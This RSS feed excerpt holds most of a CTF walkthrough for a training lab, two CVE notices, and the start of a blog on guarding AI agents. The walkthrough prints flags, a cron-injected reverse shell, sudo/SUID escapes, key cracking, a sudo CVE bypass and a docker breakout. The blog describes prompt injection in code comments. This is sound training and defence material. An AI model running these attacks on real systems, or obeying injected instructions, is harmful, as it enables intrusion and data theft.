href="https://www.rapidtables.com/convert/number/binary-to-ascii.html">https://www.rapidtables.com/convert/number/binary-to-ascii.html</a></p><pre>su mission15<br># Password: mission15{fc4915d818bfaeff01185c3547f25596}</pre><blockquote><strong>💡 What we learned:</strong><em> Binary → ASCII conversion. Recognizing encoding formats on sight is a key CTF skill.</em></blockquote><h3>🎯 Mission 16 — Hex → ASCII</h3><pre># As mission15:<br>cat /home/mission15/flag.txt | xxd -r -p</pre><p>xxd -r -p converts a raw hex string directly back to ASCII.</p><pre>su mission16<br># Password: mission16{884417d40033c4c2091b44d7c26a908e}</pre><blockquote><strong>💡 What we learned:</strong><em> Hex decoding. </em><em>xxd dumps hex (-p for plain hex), and with </em><em>-r it reverses the process.</em></blockquote><h3>🎯 Mission 17 — Execute Permission</h3><pre># As mission16:<br>ls -la /home/mission16/<br># There's a 'flag' binary but it has no execute permission<br>chmod u+x /home/mission16/flag<br>./flag</pre><pre>su mission17<br># Password: mission17{49f8d1348a1053e221dfe7ff99f5cbf4}</pre><h3>🎯 Mission 18 — Java</h3><pre># As mission17:<br>ls /home/mission17/<br># flag.java found<br>cd /home/mission17/<br>javac flag.java      # Compile<br>java flag            # Run</pre><pre>su mission18<br># Password: mission18{f09760649986b489cda320ab5f7917e8}</pre><blockquote><strong>💡 What we learned:</strong><em> Java compilation workflow: </em><em>javac compiles </em><em>.java → </em><em>.class, then </em><em>java runs the class.</em></blockquote><h3>🎯 Mission 19 — Ruby</h3><pre># As mission18:<br>ruby /home/mission18/flag.rb</pre><pre>su mission19<br># Password: mission19{a0bf41f56b3ac622d808f7a4385254b7}</pre><h3>🎯 Mission 20 — C Language</h3><pre># As mission19:<br>cd /home/mission19/<br>gcc flag.c -o flag   # Compile<br>./flag               # Run</pre><pre>su mission20<br># Password: mission20{b0482f9e90c8ad2421bf4353cd8eae1c}</pre><blockquote><strong>💡 What we learned:</strong><em> C compilation: </em><em>gcc source.c -o output_name then </em><em>./output_name to execute.</em></blockquote><h3>🎯 Mission 21 — Python</h3><pre># As mission20:<br>python3 /home/mission20/flag.py</pre><pre>su mission21<br># Password: mission21{7de756aabc528b446f6eb38419318f0c}</pre><h3>🎯 Mission 22 — Restricted Shell Escape (script)</h3><p>When you log in as <strong>mission21</strong>, you’re dropped into a restricted shell. Escape using:</p><pre>script -qc /bin/bash /dev/null</pre><p>This spawns a full bash shell. Now check .bashrc:</p><pre>cat ~/.bashrc<br># You'll find a Base64-encoded string<br>echo '&lt;base64_string&gt;' | base64 -d</pre><pre>su mission22<br># Password: mission22{24caa74eb0889ed6a2e6984b42d49aaf}</pre><blockquote><strong>💡 What we learned:</strong><em> Restricted shell escape using the </em><em>script command, which opens a new terminal session. Always check </em><em>.bashrc and </em><em>.bash_profile — attackers hide data there, and defenders do too.</em></blockquote><h3>🎯 Mission 23 — Python Interpreter Shell Escape</h3><p>Logging in as <strong>mission22</strong> drops you into a Python REPL. Escape to bash:</p><pre>import pty<br>pty.spawn("/bin/bash")</pre><p>Now read the flag:</p><pre>cat /home/mission22/flag.txt</pre><pre>su mission23<br># Password: mission23{3710b9cb185282e3f61d2fd8b1b4ffea}</pre><blockquote><strong>💡 What we learned:</strong><em> Python </em><em>pty.spawn() for shell escape — this is also a standard technique for upgrading dumb reverse shells to fully interactive TTYs in real engagements!</em></blockquote><h3>🎯 Mission 24 — Virtual Host + cURL</h3><pre># As mission23:<br>cat /home/mission23/message.txt<br>cat /etc/hosts<br># You'll see mission24.com mapped to 127.0.0.1<br>curl http://mission24.com -s | grep mission</pre><pre>su mission24<br># Password: mission24{dbaeb06591a7fd6230407df3a947b89c}</pre><blockquote><strong>💡 What we learned:</strong><em> Virtual hosting — the </em><em>/etc/hosts file acts as a local DNS resolver. In real engagements, always check </em><em>/etc/hosts for internal hostnames that reveal additional attack surface.</em></blockquote><h3>🎯 Mission 25 — Binary Analysis + viminfo</h3><pre># As mission24:<br>ls /home/mission24/<br>file bribe              # Check the file type<br>./bribe                 # Execute it — it writes to .viminfo<br>grep mission /home/mission24/.viminfo</pre><pre>su mission25<br># Password: mission25{61b93637881c87c71f220033b22a921b}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>file command identifies file types regardless of extension. </em><em>.viminfo is a hidden file storing Vim history — always run </em><em>ls -la to catch hidden files!</em></blockquote><h3>🎯 Mission 26 — PATH Manipulation</h3><p>Logging in as <strong>mission25</strong> gives you a broken environment — commands don’t work because $PATH is corrupted.</p><pre>echo $PATH<br># Empty or wrong PATH</pre><pre>export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin<br>ls -lhA<br>cat flag.txt</pre><pre>su mission26<br># Password: mission26{cb6ce977c16c57f509e9f8462a120f00}</pre><blockquote><strong>💡 What we learned:</strong><em> The </em><em>$PATH environment variable defines where the shell looks for executables. This concept is the foundation of PATH hijacking attacks — one of the most common Linux PrivEsc vectors.</em></blockquote><h3>🎯 Mission 27 — Steganography with strings</h3><pre># As mission26:<br>ls /home/mission26/<br>strings -n 20 /home/mission26/flag.jpg</pre><p>strings extracts human-readable strings from binary files. -n 20 filters results to strings of at least 20 characters.</p><pre>su mission27<br># Password: mission27{444d29b932124a48e7dddc0595788f4d}</pre><blockquote><strong>💡 What we learned:</strong><em> Basic steganography — data hidden inside image files. </em><em>strings is a quick first step when analyzing any binary or media file during a CTF or real engagement.</em></blockquote><h3>🎯 Mission 28 — Absurdly Long Filename</h3><pre># As mission27:<br>ls /home/mission27/<br>less flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz</pre><p>Yes, the filename is exactly that long. less handles it fine.</p><pre>su mission28<br># Password: mission28{03556f8ca983ef4dc26d2055aef9770f}</pre><h3>🎯 Mission 29 — Ruby Interpreter + Reverse String</h3><p>Logging in as <strong>mission28</strong> drops you into a Ruby REPL.</p><p><strong>Option 1 — Escape to shell:</strong></p><pre>exec "/bin/bash"</pre><p><strong>Option 2 — Read the file directly from Ruby:</strong></p><pre>Dir.chdir("/home/mission28")<br>puts File.open("txt.galf").readlines</pre><p>The flag is written in reverse! You’ll see something like:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'</pre><p>Reverse it:</p><pre>'}1fff2ad47eb52e68523621b8d50b2918{92noissim'.reverse</pre><pre>su mission29<br># Password: mission29{8192b05d8b12632586e25be74da2fff1}</pre><blockquote><strong>💡 What we learned:</strong><em> Ruby interpreter escape. String reversal is a common obfuscation technique in CTFs. Also notice the filename </em><em>txt.galf — that's </em><em>flag.txt reversed!</em></blockquote><h3>🎯 Mission 30 — Bludit CMS Enumeration</h3><pre># As mission29:<br>ls /home/mission29/<br>grep -rn "mission30" /home/mission29/bludit/</pre><p>The flag is buried inside Bludit CMS’s file structure.</p><pre>su mission30<br># Password: mission30{d25b4c9fac38411d2fcb4796171bda6e}</pre><h3>🎯 Viktor — Git History</h3><pre># As mission30:<br>ls /home/mission30/<br>cd /home/mission30/Escalator/<br>git --no-pager log</pre><p>Browse the git commit history — the flag is hidden in there.</p><pre>su viktor<br># Password: viktor{b52c60124c0f8f85fe647021122b3d9a}</pre><blockquote><strong>💡 What we learned:</strong><em> </em><em>git log reveals commit history. In real-world pentesting, exposed git repositories are a goldmine — credentials, API keys, and internal logic are frequently committed and never properly removed.</em></blockquote><h3>🔓 Task 4: Privilege Escalation</h3><p>You’re now <strong>viktor</strong>. The “special targets” phase begins — each user requires a different privilege escalation technique.</p><h3>🎯 Dalia — Cron Job Exploitation</h3><pre># As viktor:<br>cat /etc/crontab</pre><p>Output:</p><pre>* * * * * root bash /opt/scripts/47.sh</pre><p>Root runs /opt/scripts/47.sh every minute. Check the script and your permissions:</p><pre>cat /opt/scripts/47.sh<br>ls -la /opt/scripts/47.sh<br># You have write access!</pre><p><strong>Step 1:</strong> Create your reverse shell payload:</p><pre>vim /tmp/eop.sh</pre><p>Contents:</p><pre>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/127.0.0.1/9999 0&gt;&amp;1</pre><p><strong>Step 2:</strong> Base64-encode it and overwrite the cron script:</p><pre>cat /tmp/eop.sh | base64 -w 0<br># Copy the output, then:<br>echo 'IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx' | base64 -d &gt; /opt/scripts/47.sh</pre><p><strong>Step 3:</strong> Set up your listener:</p><pre>nc -nlvp 9999</pre><p>Wait up to 60 seconds. The cron job fires and you get a shell as <strong>dalia</strong>:</p><pre># In the received shell:<br>id<br># uid=1000(dalia) ...<br>cat /home/dalia/flag.txt</pre><p><strong>Upgrade the shell (important for stability):</strong></p><pre>python3 -c 'import pty;pty.spawn("/bin/bash")'<br>export TERM=xterm<br>export SHELL=bash<br># Press Ctrl+Z<br>stty raw -echo; fg</pre><p>Flag: dalia{4a94a7a7bb4a819a63a33979926c77dc}</p><blockquote><strong>💡 What we learned:</strong><em> Cron job exploitation — one of the most common Linux PrivEsc vectors in the wild. The checklist: find writable scripts executed by root → inject reverse shell → wait. Always enumerate </em><em>/etc/crontab, </em><em>/etc/cron.d/, and </em><em>/var/spool/cron/.</em></blockquote><h3>🎯 Silvio — sudo + zip (GTFOBins)</h3><pre># As dalia:<br>sudo -l<br># (dalia) NOPASSWD: /usr/bin/zip as silvio</pre><p>From GTFOBins — zip sudo escape:</p><pre>TF=$(mktemp -u)<br>sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'</pre><pre>id<br># uid=... (silvio)<br>cat /home/silvio/flag.txt</pre><p>Flag: silvio{657b4d058c03ab9988875bc937f9c2ef}</p><blockquote><strong>💡 What we learned:</strong><em> </em><a href="https://gtfobins.github.io/"><em>GTFOBins</em></a><em> — the essential reference for abusing binaries with sudo, SUID, or capabilities. When you see </em><em>sudo -l, immediately cross-reference every allowed binary against GTFOBins.</em></blockquote><h3>🎯 Reza — sudo + git (GTFOBins)</h3><pre># As silvio:<br>sudo -l<br># (silvio) NOPASSWD: /usr/bin/git as reza</pre><p>GTFOBins git sudo escape (uses PAGER environment variable):</p><pre>sudo -u reza PAGER='sh -c "exec sh 0&lt;&amp;1"' git -p help</pre><pre>id<br># uid=... (reza)<br>cat /home/reza/flag.txt</pre><p>Flag: reza{2f1901644eda75306f3142d837b80d3e}</p><blockquote><strong>💡 What we learned:</strong><em> Git’s </em><em>--paginate (</em><em>-p) feature invokes a pager, and by hijacking the </em><em>PAGER env variable we execute arbitrary commands. Many programs that invoke external processes are susceptible to this pattern.</em></blockquote><h3>🎯 Jordan — PYTHONPATH Hijacking</h3><pre># As reza:<br>sudo -l<br># (reza) NOPASSWD: /opt/scripts/Gun-Shop.py as jordan</pre><p>Run the script:</p><pre>sudo -u jordan /opt/scripts/Gun-Shop.py<br># Error: No module named 'shop'</pre><p>The script imports a module called shop which doesn't exist. We can create it in a directory we control:</p><p><strong>Step 1:</strong> Create a malicious shop module:</p><pre>mkdir -p /tmp/shop<br>echo 'import os; os.system("/bin/bash")' &gt; /tmp/shop/shop.py</pre><p><strong>Step 2:</strong> Override PYTHONPATH so Python finds our module first:</p><pre>sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py</pre><pre>id<br># uid=... (jordan)<br>cat /home/jordan/flag.txt</pre><p>Flag: jordan{fcbc4b3c31c9b58289b3946978f9e3c3}</p><blockquote><strong>💡 What we learned:</strong><em> Python module hijacking — a real-world PrivEsc technique. </em><em>PYTHONPATH tells Python where to search for modules before the standard library paths. If an attacker controls a directory early in that path, they can substitute any module with malicious code.</em></blockquote><h3>🎯 Ken — sudo + less (GTFOBins)</h3><pre># As jordan:<br>sudo -l<br># (jordan) NOPASSWD: /usr/bin/less as ken</pre><pre>sudo -u ken /usr/bin/less /etc/profile</pre><p>Once less opens, type ! followed by:</p><pre>!/bin/sh</pre><p>Press Enter — you drop into a shell as <strong>ken</strong>.</p><pre>id<br>cat /home/ken/flag.txt</pre><p>Flag: ken{4115bf456d1aaf012ed4550c418ba99f}</p><h3>🎯 Sean — sudo + vim (GTFOBins)</h3><pre># As ken:<br>sudo -l<br># (ken) NOPASSWD: /usr/bin/vim as sean</pre><pre>sudo -u sean vim -c ':!/bin/sh'</pre><p>The -c flag runs a Vim command on startup. :!/bin/sh executes a shell command from within Vim.</p><pre>id<br>cat /home/sean/flag.txt</pre><p>Flag: sean{4c5685f4db7966a43cf8e95859801281}</p><blockquote><strong>💡 What we learned:</strong><em> Vim is far more than a text editor — it can execute shell commands, run scripts, and spawn processes. Granting </em><em>sudo vim to any user is effectively granting root.</em></blockquote><h3>🎯 Penelope — Password Hidden in Base64</h3><pre># As sean:<br>printf %s 'VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==' | base64 -d<br># Output: "The password of penelope is p3nelope"</pre><pre>su penelope<br># Password: p3nelope<br>cat /home/penelope/flag.txt</pre><p>Flag: penelope{2da1c2e9d2bd0004556ae9e107c1d222}</p><h3>🎯 Maya — SUID base64 (GTFOBins)</h3><pre># As penelope:<br>ls -lhA /home/penelope/<br># A 'base64' binary with the SUID bit set!</pre><p>GTFOBins SUID base64 exploit — read files as the binary’s owner:</p><pre>LFILE=/home/maya/flag.txt<br>./base64 "$LFILE" | base64 -d</pre><p>Flag: maya{a66e159374b98f64f89f7c8d458ebb2b}</p><blockquote><strong>💡 What we learned:</strong><em> SUID (Set User ID) — when set on a binary, it executes with the file owner’s privileges rather than the caller’s. Find SUID binaries with: </em><em>find / -perm -4000 2&gt;/dev/null. Cross-reference every result with GTFOBins.</em></blockquote><h3>🎯 Robert — SSH Private Key Cracking</h3><pre># As maya:<br>ls -lhA /home/maya/<br>ls -lhA /home/maya/old_robert_ssh/<br># id_rsa and id_rsa.pub found</pre><p><strong>Step 1:</strong> Copy the private key to your local machine (new terminal tab):</p><pre>scp maya@&lt;IP&gt;:/home/maya/old_robert_ssh/id_rsa ./id_rsa_robert<br>chmod 600 id_rsa_robert</pre><p><strong>Step 2:</strong> Convert the key to a crackable hash:</p><pre>ssh2john id_rsa_robert &gt; robert_ssh_hash.txt</pre><p><strong>Step 3:</strong> Crack it with John the Ripper:</p><pre>john robert_ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> industryweapon</p><p><strong>Step 4:</strong> Find Robert’s SSH port on the target:</p><pre># On the target machine:<br>ss -nlpt | grep 22<br># Port 2222 is listening</pre><p><strong>Step 5:</strong> Connect:</p><pre>ssh robert@127.0.0.1 -p 2222 -i id_rsa_robert<br># Passphrase: industryweapon<br>cat /home/robert/user.txt</pre><p>Flag (user.txt): user{620fb94d32470e1e9dcf8926481efc96}</p><blockquote><strong>💡 What we learned:</strong><em> SSH private key cracking — </em><em>ssh2john extracts the hash, </em><em>john cracks it. In real engagements, always look for </em><em>id_rsa files in home directories, backup folders, and </em><em>.ssh/ directories. Encrypted keys with weak passphrases are a common finding.</em></blockquote><h3>👑 Root — Two-Stage Escalation</h3><h3>Stage 1: CVE-2019–14287 (Sudo User ID Bypass)</h3><pre># As robert:<br>sudo --version<br># Reveals a vulnerable version (&lt; 1.8.28)<br>sudo -u#-1 /bin/bash<br>whoami<br># root!</pre><p><strong>How it works:</strong> This is <strong>CVE-2019–14287</strong>. When a sudoers rule allows a user to run commands as any user, passing -u#-1 causes sudo to interpret the user ID as 0 (root) due to an integer overflow in how sudo handles negative UIDs. Patched in sudo 1.8.28.</p><pre>cd /root<br>ls</pre><h3>Stage 2: Docker Group → Root (root.txt)</h3><pre># As root (inside the container/restricted environment):<br>id<br># You're in the docker group<br>find / -name docker 2&gt;/dev/null<br># Found at /tmp/docker or similar<br>./docker ps -a<br>./docker image ls<br># "mangoman" image exists</pre><p>Mount the host filesystem into a container and chroot into it:</p><pre>./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh</pre><pre>id<br># uid=0(root) gid=0(root) — TRUE host root<br>cat /root/root.txt</pre><p>Flag (root.txt): root{62ca2110ce7df377872dd9f0797f8476}</p><blockquote><strong>💡 What we learned:</strong><em> Docker group membership is equivalent to root access. </em><em>-v /:/mnt mounts the entire host filesystem into the container, and </em><em>chroot /mnt makes the container treat the host filesystem as its root. This is a well-documented container escape — never add untrusted users to the </em><em>docker group.</em></blockquote><h3>🏆 Flags Summary</h3><p>User Technique Category mission1–11 find / grep / cat Basic enumeration mission12 env Environment variables mission13 chmod File permissions mission14 base64 -d Encoding mission15 Binary → ASCII Encoding mission16 xxd -r -p (Hex) Encoding mission17 chmod u+x Execute permissions mission18 javac + java Java compilation mission19 ruby Scripting mission20 gcc C compilation mission21 python3 Scripting mission22 script -qc Restricted shell escape mission23 pty.spawn() Python interpreter escape mission24 curl + /etc/hosts Virtual hosting mission25 strings + .viminfo Binary analysis mission26 export PATH PATH manipulation mission27 strings on image Steganography mission28 less Long filename edge case mission29 exec in Ruby + .reverse Ruby escape + obfuscation mission30 grep -r in CMS File enumeration viktor git log Git history dalia Writable cron script Cron job exploitation silvio sudo zip GTFOBins reza sudo git + PAGER GTFOBins jordan PYTHONPATH hijack Module hijacking ken sudo less + ! GTFOBins sean sudo vim -c GTFOBins penelope Base64 password Encoded credentials maya SUID base64 SUID exploitation robert ssh2john + john SSH key cracking root (user.txt) sudo -u#-1 CVE-2019-14287 root (root.txt) docker run -v /:/mnt Docker breakout</p><h3>🧠 Key Takeaways</h3><p><strong>Linux Fundamentals:</strong></p><ul><li>ls -la always — hidden files, permissions at a glance</li><li>find and grep -r for wide enumeration</li><li>env for environment variable inspection</li><li>file to identify file types regardless of extension</li><li>strings to extract readable data from binaries</li></ul><p><strong>Encoding &amp; Decoding:</strong></p><ul><li>Base64 (base64 -d), Hex (xxd -r -p), Binary (Python one-liner)</li><li>Reversed strings — check file content and filenames alike</li></ul><p><strong>Scripting Languages:</strong></p><ul><li>Python: pty.spawn("/bin/bash") for shell upgrade</li><li>Ruby: exec "/bin/bash" or Dir/File for file ops</li><li>Java: javac → java, C: gcc → ./binary</li></ul><p><strong>Privilege Escalation Checklist:</strong></p><ol><li>sudo -l → GTFOBins</li><li>find / -perm -4000 2&gt;/dev/null → SUID binaries → GTFOBins</li><li>cat /etc/crontab + ls /etc/cron.d/ → writable scripts run by root</li><li>id → check group memberships (docker!)</li><li>Check $PATH, env variables, writable directories in PATH</li></ol><h3>📚 Resources</h3><ul><li>🔗 <a href="https://gtfobins.github.io/">GTFOBins</a> — sudo/SUID binary exploitation reference</li><li>🔗 <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadsAllTheThings — Reverse Shell Cheatsheet</a></li><li>🔗 <a href="https://www.exploit-db.com/exploits/47502">Exploit-DB: CVE-2019–14287</a></li><li>🔗 <a href="https://tryhackme.com/room/sudovulnsbypass">TryHackMe: Sudo Security Bypass</a></li><li>🔗 <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation">HackTricks: Docker Breakout</a></li><li>🔗 <a href="https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html">RapidTables Converter</a></li></ul><h3>💬 Final Thoughts</h3><p><strong>Linux Agency</strong> is not just a CTF room — it’s a condensed simulation of a real lateral movement and privilege escalation engagement. The 30-user chain forces you to internalize Linux enumeration as a reflex, not a checklist. The privilege escalation phase covers more ground than most dedicated PrivEsc rooms.</p><p>If you’re preparing for <strong>OSCP</strong>, <strong>CPTS</strong> or any practical security certification, this room belongs in your training regimen. Do it without hints first, refer to this write-up only when truly stuck — the struggle is where the learning happens.</p><p><em>Happy Hacking! 🐧</em></p><p><em>Tags: #TryHackMe #CTF #LinuxAgency #PrivilegeEscalation #Linux #Pentesting #CyberSecurity #OSCP #GTFOBins #WriteUp</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=82a20bd23d67" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-linux-agency-complete-write-up-walkthrough-82a20bd23d67">TryHackMe — Linux Agency | Complete Write-Up &amp; Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44596 | Yamcs up to 5.12.6 AuthHandler.java excessive authentication (EDB-52605)]]></title>
<description><![CDATA[A vulnerability was found in Yamcs up to 5.12.6. It has been classified as problematic. This issue affects some unknown processing of the file yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java. The manipulation leads to improper restriction of excessive authentication attempts.

This ...]]></description>
<link>https://tsecurity.de/de/3674557/sicherheitsluecken/cve-2026-44596-yamcs-up-to-5126-authhandlerjava-excessive-authentication-edb-52605/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674557/sicherheitsluecken/cve-2026-44596-yamcs-up-to-5126-authhandlerjava-excessive-authentication-edb-52605/</guid>
<pubDate>Thu, 16 Jul 2026 22:06:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/yamcs">Yamcs up to 5.12.6</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the file <em>yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java</em>. The manipulation leads to improper restriction of excessive authentication attempts.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-44596">CVE-2026-44596</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44595 | Yamcs up to 5.12.6 IAM API IamApi.java information disclosure (EDB-52604)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Yamcs up to 5.12.6. The impacted element is an unknown function of the file yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java of the component IAM API. Such manipulation leads to information disclosure.

This vulnerability is...]]></description>
<link>https://tsecurity.de/de/3674556/sicherheitsluecken/cve-2026-44595-yamcs-up-to-5126-iam-api-iamapijava-information-disclosure-edb-52604/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674556/sicherheitsluecken/cve-2026-44595-yamcs-up-to-5126-iam-api-iamapijava-information-disclosure-edb-52604/</guid>
<pubDate>Thu, 16 Jul 2026 22:05:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/yamcs">Yamcs up to 5.12.6</a>. The impacted element is an unknown function of the file <em>yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java</em> of the component <em>IAM API</em>. Such manipulation leads to information disclosure.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-44595">CVE-2026-44595</a>. The attack can be launched remotely. Moreover, an exploit is present.]]></content:encoded>
</item>
<item>
<title><![CDATA[Demystifying AI Exploits: A Blueprint for AI-Assisted Vulnerability Management]]></title>
<description><![CDATA[Written by: Jules Czarniak

Introduction 
As highlighted in the Mandiant M-Trends 2026 report, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. 
To keep pace, many security teams are exploring how to integrate la...]]></description>
<link>https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</guid>
<pubDate>Thu, 16 Jul 2026 16:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jules Czarniak</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction </span></h3>
<p><span>As highlighted in the </span><a href="https://cloud.google.com/security/resources/m-trends"><span>Mandiant M-Trends 2026 report</span></a><span>, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. </span></p>
<p><span>To keep pace, many security teams are exploring how to integrate large language model (LLM) agents into their codebases, development environments and continuous integration and continuous delivery (CI/CD) pipelines for automated vulnerability discovery and remediation. However, deploying privileged artificial intelligence (AI) agents without mature integration processes introduces new architectural risks. </span></p>
<p><span>In response to customer inquiries about how to safely integrate AI capabilities into vulnerability management workflows, this blog provides actionable guidance from Mandiant Consulting about how to establish operational guardrails for AI assisted vulnerability management, including several detailed scenarios. What each of these examples show is that security teams can accelerate workflows with AI while also upholding the structural integrity of their environments. We suggest that combining AI capabilities with deterministic controls and human intelligence in strategic ways maximizes benefits and reduces risk. </span></p>
<h3><span>Establish Operational Guardrails to Safely Deploy AI Agents</span></h3>
<p><span>To safely adopt advanced AI capabilities without introducing unpredictable failures into deployment pipelines, organizations should ground their approach in established industry standards. While guidelines like the </span><a href="https://www.nist.gov/itl/ai-risk-management-framework" rel="noopener" target="_blank"><span>NIST AI Risk Management Framework (RMF)</span></a><span> and the </span><a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/" rel="noopener" target="_blank"><span>OWASP Top 10 for LLMs</span></a><span> provide comprehensive baselines for identifying risks, operationalizing these controls requires a structural blueprint.</span></p>
<p><span>Frameworks like </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>Google’s Secure AI Framework (SAIF)</span></a><span> </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>and</span></a><a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/1018686.pdf" rel="noopener" target="_blank"><span> </span><span>Google’s approach to secure AI Agents</span></a><span> provide a practical path forward, demanding that organizations extend existing deterministic controls directly into the AI execution environment. When deploying AI agents, security teams should navigate specific operational and structural risks:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Pre-agent data security and Defense-in-Depth:</strong><span> Agents should not be able to access personally identifiable information (PII), protected health information (PHI), or other sensitive data. Organizations should enforce data security before the prompt reaches the model. This includes strictly using non-production environments populated with synthetic data for testing. For production, security teams should deploy a hybrid defense-in-depth model. This includes Layer 1 deterministic policy engines acting as chokepoints, alongside Layer 2 reasoning-based defenses like specialized guard models (such as </span><a href="https://docs.cloud.google.com/model-armor/overview"><span>Model Armor</span></a><span> or similar provider-agnostic guardrails) to filter out sensitive data and block malicious prompt injections before they reach the agent layer. Crucially for vulnerability discovery, security teams should treat the codebase itself as an untrusted input. Threat actors can embed indirect prompt injections within source code comments or third-party dependencies (e.g., hidden instructions telling the agent to ignore vulnerabilities or exfiltrate environment variables), making input sanitation a requirement even for internal scanning.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cloud provider limitations and zero data retention (ZDR):</strong><span> Many cloud and LLM providers block or throttle automated offensive security probing by default to prevent abuse. Organizations should establish clear rules of engagement and authorized testing agreements to navigate acceptable use policies. Furthermore, organizations should enforce strict zero data retention (ZDR) agreements with their LLM providers to guarantee that proprietary code and discovered vulnerabilities are never used to train external models.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Workload isolation:</strong><span> Agent workloads should execute in strictly isolated, unprivileged containers with dynamically limited privileges. By relying on robust sandboxing to prevent privilege escalation, if an agent hallucinates a destructive command or is hijacked via prompt injection, the blast radius remains contained.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Red Teaming:</strong><span> Before deploying autonomous vulnerability scanners that can dynamically spin up sandboxes and execute code, organizations should subject the AI agents themselves to human-led red teaming as part of comprehensive assurance efforts. This validates the agent's resilience against jailbreaks, recursive logic loops, and complex prompt injections, ensuring the security tooling does not become the attack vector.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Least-Privileged Machine Identities and Human Controllers:</strong><span> While workloads should be isolated, agents inherently require privileges to generate pull requests and commit code. Security teams should ensure these agents operate under distinct, strictly scoped machine identities that tie back to human controllers to ensure accountability and user consent. Organizations should use short-lived, just-in-time (JIT) tokens bound exclusively to the specific repository and branch under review. T</span><span>his enforces the principle of limited agent powers and ensures that even if an agent’s container is compromised via prompt injection, the threat actor cannot pivot to modify adjacent enterprise codebases.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Supply chain resilience for skills:</strong><span> As developers augment AI with third-party skills and model context protocol (MCP) servers, security teams should treat these integrations as untrusted supply chain components. MCP plugins introduce the risk of supply chain poisoning, where a previously benign integration is silently updated with malicious dependencies. Additionally, security teams should evaluate the underlying agent orchestration frameworks themselves (e.g., LangChain, AutoGen) for inherent vulnerabilities, such as session memory poisoning or recursive loop hijacking.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Toxic flow analysis (TFA) and Observable Actions:</strong><span> The objective of TFA is to monitor data paths at runtime, ensuring agents do not exfiltrate sensitive internal context to unvetted external endpoints. Agent actions, inputs, reasoning, and outputs must be fully observable and transparently logged. While implementing dynamic taint tracking for LLMs remains a complex architectural challenge, organizations should clearly separate this runtime observability from static supply chain controls. Integrating threat intelligence to hash and vet incoming agent tools provides a necessary baseline for verifying integrity </span><span>before</span><span> deployment. However, because static controls cannot address behavior post-deployment, mitigating data exfiltration ultimately requires active runtime monitoring and secure, centralized logging to trace and restrict the actual flow of data.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

